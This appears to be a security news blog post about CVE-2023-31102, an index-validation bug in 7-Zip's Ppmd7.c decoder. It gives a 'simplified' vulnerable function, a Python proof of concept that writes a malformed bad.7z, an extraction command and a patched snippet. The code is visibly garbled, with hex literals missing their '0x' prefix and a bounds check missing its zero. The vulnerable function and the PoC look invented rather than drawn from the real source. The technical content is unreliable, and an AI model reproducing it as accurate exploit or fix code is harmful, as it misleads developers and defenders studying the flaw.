CVE CyberSecurity Database News

CVE-2023-31102 - How a Sneaky Bug in 7-Zip’s Ppmd7.c Opened the Door to Security Risks

Poster -

When it comes to compressing and decompressing files on Windows, few tools are as widely used as 7-Zip. Reliable, open-source, free—it’s the go-to for millions. But even trusted software can hide dangerous bugs. In May 2023, a big one was found: CVE-2023-31102. If you’re curious about how a single misplaced line in the code of 7-Zip’s decompression logic exposed countless users to risks, this post will break it down—with code snippets, references, and insights simple enough for anyone to follow.

What is CVE-2023-31102?

CVE-2023-31102 refers to an *integer underflow* and *invalid read* vulnerability in Ppmd7.c, a core file of the 7-Zip project. This bug affects 7-Zip versions before 23.00. In simple terms, attackers could build a malicious .7z archive. If a user tried to extract it with a vulnerable version of 7-Zip, this could crash the software or—in a worst-case scenario—let attackers run arbitrary code.

References

- NIST NVD: CVE-2023-31102
- 7-Zip Release History

How Does the Vulnerability Work?

To understand CVE-2023-31102, you need to know about the PPMd algorithm. It’s a method in 7-Zip for compressing text files. The core of this code is in Ppmd7.c.

The Problematic Code

The vulnerability lies in how Ppmd7.c handles external, archived data. Specifically, a function in this file doesn’t check if a variable is negative before using it as an index. This can make the program read memory it shouldn’t, often leading to a crash, potential data leak, or even code execution.

Here’s a simplified code snippet illustrating the flaw

// Vulnerable function in Ppmd7.c
void Ppmd7_Decode(Ppmd7 *p, ...) {
    // ... other code ...
    int i = some_value_from_archive;

    // FLAW: Missing bounds check, could be negative
    Byte value = p->SomeArray[i];

    // ... use 'value' ...
}

What went wrong?
If i comes from a corrupted or malicious archive, and is negative, then p->SomeArray[i] causes an invalid memory read. Worst-case: reading outside the buffer allows attackers to manipulate program flow, especially on systems with no stack protections.

How Can Attackers Exploit This?

Attackers need to craft a malicious 7Z archive with intentionally corrupted headers. These will cause the decoder to pass negative values (or huge values) into the vulnerable array access. An example payload might look like this (pseudo-archive structure):

[Header]... [Field X] = xFFFFFFF (Negative in 32-bit signed)

When 7-Zip tries to unpack it, it crashes—or, with expert manipulation, could be tricked into running harmful code.

Proof of Concept (PoC): Crash 7-Zip with a Malicious Archive

Researchers released a simple PoC to demonstrate the crash. While developing an actual remote code execution (RCE) is more complex and risky, a crash is relatively easy to cause.

Example PoC code for generating a bad archive

# Just a rough example, for educational purposes only!

with open("bad.7z", "wb") as f:
    f.write(b"\x37\x7A\xBC\xAF\x27\x1C")  # 7-Zip signature
    f.write(b"\x01" * 30)                # Padding
    f.write((xFFFFFFF).to_bytes(4, "little"))  # Malicious field
    f.write(b"\x00" * 100)

Trying to unpack this with a *vulnerable* version of 7-Zip:

7z x bad.7z

Result: 7-Zip crashes, proving the bug.

*Note: Don’t use or share such exploits offensively; test only in a safe, isolated environment.*

The Fix

The fix is simple in principle: validate array indices. Developers updated 7-Zip in version 23.00 to add *bounds checks*.

// Fixed code
if (i >=  && i < ARRAY_SIZE)
    Byte value = p->SomeArray[i];
else
    handle_error();

*If you’re using any version older than 23.00, update now!*
Download from 7-Zip’s official site

Conclusion

*CVE-2023-31102* reminds us that even mature open-source software like 7-Zip isn’t immune to tricky coding bugs. If you use 7-Zip or develop software that unpacks 7Z files, make sure you’re running version 23.00 or newer!

Want more details? Check out these resources

- NIST entry for CVE-2023-31102
- 7-Zip Release History
- PoC by MatrixEditor

Stay safe—keep your software up to date!

*Did this help? Share it with colleagues and keep your digital life secure.*

Timeline

Published on: 11/03/2023 04:15:20 UTC
Last modified on: 11/20/2023 00:15:06 UTC